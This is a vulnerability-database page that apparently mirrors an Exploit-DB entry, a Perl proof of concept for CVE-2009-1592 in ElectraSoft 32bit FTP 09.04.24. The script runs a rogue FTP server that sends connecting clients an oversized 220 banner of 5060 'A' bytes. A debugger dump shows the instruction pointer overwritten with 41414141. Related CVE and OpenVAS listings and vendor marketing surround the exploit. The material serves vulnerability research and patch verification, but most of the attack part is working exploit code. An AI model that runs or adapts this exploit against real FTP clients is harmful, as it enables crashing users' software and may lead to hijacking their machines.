Lucene search
+L

32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow (PoC)

🗓️ 05 May 2009 00:00:00Reported by Load 99%Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

32bit FTP Banner Remote Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1592
5 May 200900:00
circl
cve
CVE
CVE-2009-1592
8 May 200918:00
cve
cvelist
Cvelist
CVE-2009-1592
8 May 200918:00
cvelist
exploitdb
Exploit DB
32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow
5 May 200900:00
exploitdb
nvd
NVD
CVE-2009-1592
8 May 200918:30
nvd
openvas
OpenVAS
ElectraSoft 32bit FTP Buffer Overflow Vulnerability
13 May 200900:00
openvas
openvas
OpenVAS
ElectraSoft 32bit FTP Buffer Overflow Vulnerability
13 May 200900:00
openvas
prion
Prion
Stack overflow
8 May 200918:30
prion
#!/usr/bin/perl
#
# A client side vulnerability in the product allows remote servers to cause the  client to crash by sending it a large banner.
#  By: Load 99%
#
# website: http://www.electrasoft.com/32ftp.htm
# Version:09.04.24
#
#0:005> g
# ...
#(9b0.bac): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=41414141 ebx=00000001 ecx=000013e7 edx=0382ec14 esi=fffffffe edi=00000000
#eip=41414141 esp=0382f018 ebp=0382f050 iopl=0         nv up ei pl nz na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
#41414141 ??              ???
#
use IO::Socket::INET;

my $socket = IO::Socket::INET->new('LocalPort' => 21,
                   'Proto' => 'tcp',
                   'Listen' => SOMAXCONN)
    or die "Can't create socket ($!)\n";

print "Server listening\n";
$data = "220 ".("\x41" x 5060)."\r\n";

while (my $client = $socket->accept) {
    print "send> data.\n";
    print $client $data;
}
die "Can't accept socket ($!)\n";

# milw0rm.com [2009-05-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 May 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.07098
31